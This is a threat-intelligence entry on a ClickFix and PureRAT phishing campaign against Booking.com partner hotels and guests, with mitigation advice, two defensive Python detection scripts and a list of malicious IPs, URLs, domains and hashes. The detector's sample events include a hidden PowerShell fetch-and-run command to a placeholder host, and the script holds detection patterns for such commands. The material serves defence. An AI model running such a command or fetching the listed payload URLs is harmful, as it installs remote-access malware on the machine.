Booking.com Phishing Campaign Targeting Hotels and Customers
A phishing and payment-fraud campaign targets Booking.com partner hotels and their guests. Hotel administrators' workstations are first compromised with malware such as PureRAT, delivered through ClickFix-style lures and malicious sites, which gives the attackers access to the hotels' booking-management accounts. From there they send guests spear-phishing messages that impersonate Booking.com and trick them into paying for a reservation a second time. The infrastructure mixes compromised legitimate websites with bulletproof hosting, and the operation draws on a broader cybercrime ecosystem that sells specialized services for attacks on booking platforms. The threat affects the confidentiality of reservation data and the financial integrity of hotel bookings and guest payments. European hospitality businesses that rely on Booking.com are exposed, especially in countries with large tourism sectors. Mitigation requires security controls on hotel admin systems, staff and guest awareness, and monitoring for unusual booking and payment activity.
AI Analysis
Technical Summary
This is a multi-stage fraud campaign against the hospitality sector, specifically Booking.com partner hotels and their guests. The first stage targets hotel staff: lures themed around the Booking.com extranet (the admin-extranet*-captcha.com domains in the indicator list fit this pattern) use the ClickFix technique, in which the victim is shown a fake verification or error prompt and told to paste a command into the Windows Run dialog or a terminal; the pasted command installs a remote access trojan such as PureRAT. With control of an administrator's workstation and its booking-management session, the attackers can read reservations and contact guests, which sets up the second stage: spear-phishing that impersonates Booking.com and sends guests to payment-verification pages on lookalike domains (cardverify*-booking.com, confirmation*-booking.com, and an Expedia variant), where they pay for a reservation a second time. The infrastructure combines compromised legitimate websites (the short random paths on unrelated business domains in the indicator list are consistent with redirectors planted on hacked sites), traffic distribution systems, and bulletproof hosting, which complicates takedown and attribution. The campaign sits inside a broader cybercrime ecosystem in which access to hotel accounts, phishing kits and hosting are traded as services on underground forums. The tradecraft (credential and session access, commodity RAT deployment, social engineering, abuse of legitimate infrastructure) indicates an organized and well-resourced operator. No software vulnerability is exploited: the campaign relies entirely on social engineering and stolen access, so the relevant controls are on people, endpoints and account sessions rather than on patching.
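As an added example (not code from the Sekoia report, AlienVault, or this page), the following Python script shows the kind of endpoint detection that targets the ClickFix step described above. It parses constructed Sysmon-style process-creation events (the Key=Value line format, the host names, user names and URLs are all made up for illustration) and scores each event on two signals: whether explorer.exe launched a script interpreter, which is what a command pasted into the Run dialog looks like in a process tree, and whether the command line contains download-and-execute fragments.

```python
import re
from dataclasses import dataclass

# Script hosts that ClickFix one-liners are pasted into after Win+R.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe"}

# Command-line fragments typical of "fetch and run remote content".
FRAGMENT_PATTERNS = [
    r"-enc(odedcommand)?\b",
    r"downloadstring",
    r"invoke-webrequest|\biwr\b|\birm\b|invoke-restmethod",
    r"\bhttps?://",
    r"\biex\b|invoke-expression",
    r"-w(indowstyle)?\s+hidden",
]
FRAGMENT_RE = re.compile("|".join(FRAGMENT_PATTERNS), re.IGNORECASE)


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str
    user: str


def parse_event(line: str) -> ProcessEvent:
    """Parse one 'Key=Value|Key=Value' line (a constructed format, not Sysmon XML)."""
    fields = dict(kv.split("=", 1) for kv in line.strip().split("|"))
    return ProcessEvent(fields["ParentImage"], fields["Image"],
                        fields["CommandLine"], fields["User"])


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def clickfix_score(ev: ProcessEvent) -> int:
    """0-3: +1 if explorer.exe (Run dialog) spawned a script host,
    +1 per distinct download/execute fragment found, capped at 2."""
    score = 0
    if basename(ev.parent_image) == "explorer.exe" and basename(ev.image) in SCRIPT_HOSTS:
        score += 1
    hits = {m.group(0).lower() for m in FRAGMENT_RE.finditer(ev.command_line)}
    return score + min(len(hits), 2)


def detect(lines, threshold: int = 2):
    """Return (user, image basename, score) for every event at or above threshold."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        score = clickfix_score(ev)
        if score >= threshold:
            alerts.append((ev.user, basename(ev.image), score))
    return alerts


# Constructed sample events; hosts, users and URLs are made up.
SAMPLE_EVENTS = [
    "ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell -w hidden -c \"iex (iwr http://verify.example.invalid/captcha)\"|User=HOTEL\\frontdesk",
    "ParentImage=C:\\Windows\\System32\\cmd.exe|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell -File C:\\scripts\\nightly-backup.ps1|User=HOTEL\\itadmin",
    "ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\mshta.exe"
    "|CommandLine=mshta https://verify.example.invalid/check.hta|User=HOTEL\\reception",
    "ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\notepad.exe"
    "|CommandLine=notepad.exe C:\\Users\\reception\\shift-notes.txt|User=HOTEL\\reception",
]

if __name__ == "__main__":
    for user, image, score in detect(SAMPLE_EVENTS):
        print(f"ALERT score={score} user={user} image={image}")
```

Tune the threshold to the machine's role: reception and reservations staff almost never launch PowerShell or mshta from the Run dialog, so on those workstations a score of 2 is already worth a ticket, whereas on IT administrators' machines the parent-process signal alone will be noisy and the command-line fragments carry the weight.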
Potential Impact
For European organizations, particularly hotels partnered with Booking.com, the direct impact is financial loss from fraudulent second payments (refunds or goodwill compensation to defrauded guests, chargebacks) and reputational damage as guests lose trust in the property. The compromise of a hotel administrator's system also exposes the reservation data visible in the booking-management account: guest names, contact details, stay dates and potentially payment information. That exposure is a personal data breach under GDPR, with its own notification obligations towards the supervisory authority and affected guests, separate from the fraud itself. Attackers operating inside the booking platform can also disrupt reservations, which affects availability and operational continuity. Because hospitality is a major economic sector in the affected countries, large-scale exploitation would have repercussions beyond individual properties. Finally, the use of compromised legitimate websites and bulletproof hosting complicates takedown, incident response and attribution, which increases the operational burden on security teams.
Mitigation Recommendations
Hotels that use the Booking.com extranet should treat the administrator workstation and its logged-in session as the asset to protect. On endpoints, run EDR on every machine that signs in to the extranet, hunt for the file hashes and command-and-control addresses in the indicator list (the two IP addresses appear with TCP port 56001 in the listed URLs), and alert on the ClickFix execution pattern: explorer.exe launching powershell.exe, mshta.exe or cmd.exe with a command line that downloads and runs remote content, which is what a command pasted into the Run dialog looks like. Where reception staff have no legitimate need for them, restrict script interpreters and the Run dialog by policy. On accounts, enforce multi-factor authentication on every booking-management and administrative login, with the caveat that a RAT on the administrator's machine can ride the already-authenticated browser session; MFA limits credential reuse but does not end an active compromise, so review active sessions and force re-authentication after any suspicious event. Train reception and reservations staff that no CAPTCHA, error or "fix" page ever legitimately asks them to paste a command, and that extranet verification links arriving by email or chat should be ignored in favour of typing the extranet address directly. Monitor the booking system for anomalies such as duplicate payments for one reservation, outbound guest messages requesting payment confirmation, and logins at unusual times or from unusual locations, and tell guests at booking time that the hotel never sends payment links by message. At the network edge, block the listed domains and IP addresses at DNS and proxy level; when matching, compare the registrable domain rather than a suffix, because the lookalikes end in -booking.com without being booking.com subdomains. Keep systems patched as routine hygiene, but note that this campaign exploits no software vulnerability, so patching alone does not address it. Maintain an incident response plan for phishing and credential compromise, coordinate with Booking.com to verify suspicious transactions and share indicators, and report to law enforcement so that the evolving infrastructure can be tracked.
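The DNS and proxy blocking advice above has one trap that is worth showing in code: the lookalike domains in this campaign (cardverify0006-booking.com, confirmation887-booking.com) end in the string booking.com but are separate registrable domains, so any check that tests for a "booking.com" suffix will treat them as trusted. The script below is an added example, not code from this page or the Sekoia report. It classifies constructed DNS query lines (the log format, client IPs and confirmation1234-booking.com are made up; the indicator domains are taken from the list on this page) by first reducing each name to its registrable domain and only then comparing it against the allowlist, the indicator set and a few brand tokens.

```python
import re

# Indicator domains copied from this page's IoC list (subset).
IOC_DOMAINS = {
    "sqwqwasresbkng.com",
    "cardverify0006-booking.com",
    "confirmation887-booking.com",
    "admin-extranetadm-captcha.com",
    "bkngpropadm.com",
    "verifycard45625-expedia.com",
    "emprotel.net.bo",
}

# Registrable domains that must never be flagged. Only booking.com is
# grounded in the page; anything else is the operator's own allowlist.
ALLOWLIST = {"booking.com"}

# Minimal multi-label suffix table, enough for the TLDs in the IoC list.
# Real deployments should use the Public Suffix List (e.g. tldextract).
MULTI_LABEL_SUFFIXES = {"net.bo", "com.bo", "co.uk", "com.au"}

# Brand tokens that a lookalike in this campaign tends to contain.
LOOKALIKE_TOKENS = ("booking", "bkng", "bknq", "extranet", "expedia")


def registrable_domain(host: str) -> str:
    """Reduce a hostname to its registrable domain (eTLD+1).
    cardverify0006-booking.com -> cardverify0006-booking.com (NOT booking.com)."""
    labels = host.lower().rstrip(".").split(".")
    suffix_labels = 2 if ".".join(labels[-2:]) in MULTI_LABEL_SUFFIXES else 1
    return ".".join(labels[-(suffix_labels + 1):])


def classify(host: str) -> str:
    """allow | ioc | lookalike | clean, decided on the registrable domain."""
    rd = registrable_domain(host)
    if rd in ALLOWLIST:
        return "allow"
    if rd in IOC_DOMAINS:
        return "ioc"
    if any(token in rd for token in LOOKALIKE_TOKENS):
        return "lookalike"
    return "clean"


# Constructed DNS query log format: "<timestamp> <client-ip> query <qname>"
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) query (?P<qname>\S+)$")


def scan(lines):
    """Return (client, qname, verdict) for every query that is an IoC or a lookalike."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # skip lines that are not query records
        verdict = classify(m["qname"])
        if verdict in ("ioc", "lookalike"):
            findings.append((m["client"], m["qname"].lower().rstrip("."), verdict))
    return findings


# Constructed sample log. Client IPs and confirmation1234-booking.com are made up;
# the other names are from the page's indicator list or the legitimate brand domain.
SAMPLE_LOG = [
    "2025-11-07T09:36:10Z 10.0.5.21 query admin.booking.com.",
    "2025-11-07T09:36:12Z 10.0.5.21 query cardverify0006-booking.com.",
    "2025-11-07T09:37:01Z 10.0.5.33 query www.admin-extranetadm-captcha.com.",
    "2025-11-07T09:38:44Z 10.0.5.33 query confirmation1234-booking.com.",
    "2025-11-07T09:39:00Z 10.0.5.40 query emprotel.net.bo.",
    "2025-11-07T09:39:05Z 10.0.5.40 query cdn.example.org.",
]

if __name__ == "__main__":
    for client, qname, verdict in scan(SAMPLE_LOG):
        print(f"{verdict:9} {client:12} {qname}")
```

The lookalike verdict is a triage signal, not a block decision: any registrable domain containing "booking" will match, including legitimate third parties, so route those hits to an analyst and block only confirmed indicators. Replace the four-entry suffix table with the Public Suffix List before using this beyond a demonstration; the emprotel.net.bo entry is there precisely to show why a naive "last two labels" rule is wrong.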
Affected Countries
France, Spain, Italy, Germany, United Kingdom, Netherlands, Portugal, Greece, Austria, Switzerland
Indicators of Compromise
The indicators below are the ones published in the AlienVault pulse, grouped by type. The hashes are unlabelled in the source; by length they are MD5, SHA-1 and SHA-256 values, and the source does not say which files they correspond to.
- ip: 85.208.84.94
- ip: 77.83.207.106
- url: http://77.83.207.106:56001
- url: http://85.208.84.94:56001
- url: http://activatecapagm.com/j8r3
- url: http://bkngpropadm.com/bomla
- url: http://bkngssercise.com/bomla
- url: http://bknqsercise.com/bomla
- url: http://bqknsieasrs.com/loggqibkng
- url: http://brownsugarcheesecakebar.com/ajm4
- url: http://byliljedahl.com/8anf
- url: http://byliljedahl.com/lv6q
- url: http://cabinetifc.com/upseisser.zip
- url: http://cardverify0006-booking.com/37858999
- url: http://confirmation8324-booking.com/17149438
- url: http://confirmation887-booking.com/17149438
- url: http://cquopymaiqna.com/bomla
- url: http://ctrlcapaserc.com/bomla
- url: http://ctrlcapaserc.com/loggqibkng
- url: http://customvanityco.com/izsb
- url: http://emprotel.net.bo/updserc.zip
- url: http://guest03442-booking.com/17149438
- url: http://hareandhosta.com/95xh
- url: http://headkickscountry.com/lz1y
- url: http://homelycareinc.com/po7r
- url: http://jamerimprovementsllc.com/ao9o
- url: http://seedsuccesspath.com/6m8a
- url: http://verifycard45625-expedia.com/67764524
- url: http://verifyguest02667-booking.com/17149438
- url: http://zenavuurwerkofficial.com/62is
- domain: activatecapagm.com
- domain: admin-extranet-reservationsexp.com
- domain: admin-extranet-reservationsinfos.com
- domain: admin-extranetadm-captcha.com
- domain: admin-extranetadmns-captcha.com
- domain: admin-extranetmngrxz-captcha.com
- domain: admin-extranetmnxz-captcha.com
- domain: admin-extranetrservq-cstmrq.com
- domain: aidaqosmaioa.com
- domain: api-notification-centeriones.com
- domain: bkngpropadm.com
- domain: bkngssercise.com
- domain: bknqsercise.com
- domain: booking-agreementaprilreviews042025.com
- domain: booking-agreementstatementapril0225.com
- domain: booking-agreementstatementapril0429.com
- domain: booking-aprilreviewstir-9650233.com
- domain: booking-confview-doc-00097503843.com
- domain: booking-confviewdocum-0079495902.com
- domain: booking-refguestitem-09064111.com
- domain: booking-reservationinfosid0251358.com
- domain: booking-reservationsdetail-id0025911.com
- domain: booking-reviewsguestpriv-10101960546.com
- domain: booking-viewdocdetails-0975031.com
- domain: booking-visitorviewdetails-64464043.com
- domain: bookingadmin-updateofmay2705.com
- domain: bookreservfadrwer-customer.com
- domain: bqknsieasrs.com
- domain: breserve-custommessagehelp.com
- domain: brownsugarcheesecakebar.com
- domain: byliljedahl.com
- domain: cabinetifc.com
- domain: cardverify0006-booking.com
- domain: caspqisoals.com
- domain: comsquery.com
- domain: confirmation8324-booking.com
- domain: confirmation887-booking.com
- domain: confirminfo-hotel20may05.com
- domain: confsvisitor-missing-items.com
- domain: confvisitor-doc.com
- domain: contmasqueis.com
- domain: cquopymaiqna.com
- domain: ctrlcapaserc.com
- domain: customvanityco.com
- domain: eiscoaqscm.com
- domain: emprotel.net.bo
- domain: extranet-admin-reservationssept.com
- domain: guest03442-booking.com
- domain: guestinfo-aboutstay1205.com
- domain: guesting-servicesid91202.com
- domain: hareandhosta.com
- domain: headkickscountry.com
- domain: homelycareinc.com
- domain: jamerimprovementsllc.com
- domain: mccp-logistics.com
- domain: mccplogma.com
- domain: reserv-captchaapril04152025.com
- domain: seedsuccesspath.com
- domain: sqwqwasresbkng.com
- domain: update-info1676.com
- domain: update-infos616.com
- domain: verifycard45625-expedia.com
- domain: verifyguest02667-booking.com
- domain: whooamisercise.com
- domain: whooamisercisea.com
- domain: zenavuurwerkofficial.com
- hash (MD5): 32108a830908f88f9949d6c0cbbaea2e
- hash (MD5): 51b0c87f9956b1c0a2a9288682cfdbae
- hash (MD5): 799e73863806df2964d80d12ce4e61ea
- hash (MD5): a3cc88c9d37b9007e5b6d3446bf9e1e4
- hash (MD5): d4845669f7f56c6c4eb82147a1f82615
- hash (SHA-1): 25f6e7cf30010425523d88c02b4cd147ee8eedf1
- hash (SHA-1): 6cad060b2934c422945c5d706b0701a42e02c145
- hash (SHA-1): c3eba229c847caa61117c3d0f84efaec7f33a2f7
- hash (SHA-1): e4885686dc64aeaae61eb67ca715ce4b7e07b670
- hash (SHA-256): 5301f5a3fb8649edb0a5768661d197f872d40cfe7b8252d482827ea27077c1ec
- hash (SHA-256): 64838e0a3e2711b62c4f0d2db5a26396ac7964e31500dbb8e8b1049495b5d1f3
- hash (SHA-256): 703355e8e93f30df19f7f7b8800bd623f1aee1f020c43a4a1e11e121c53b5dd1
- hash (SHA-256): 9bab404584f6a0d9d82112d6e017cfa37d0094d97e510101d6a0132fd145dd32
Two further entries in the source, action.properties.company and destination.geo.country, are listed as domains but read like structured data field names rather than campaign infrastructure; they are most likely an ingestion artifact and should be verified before being added to any blocklist.
Technical Details
- Author: AlienVault
- TLP: white
- References: https://blog.sekoia.io/phishing-campaigns-i-paid-twice-targeting-booking-com-hotels-and-customers/
- Adversary: none attributed
- Pulse Id: 690dba690d5c272baae78d78
- Threat Score: not set
Threat ID: 690dbd8a03ca3124669e0ec2
Added to database: 11/7/2025, 9:36:10 AM
Last enriched: 1/14/2026, 2:38:06 PM
Last updated: 2/6/2026, 11:50:08 AM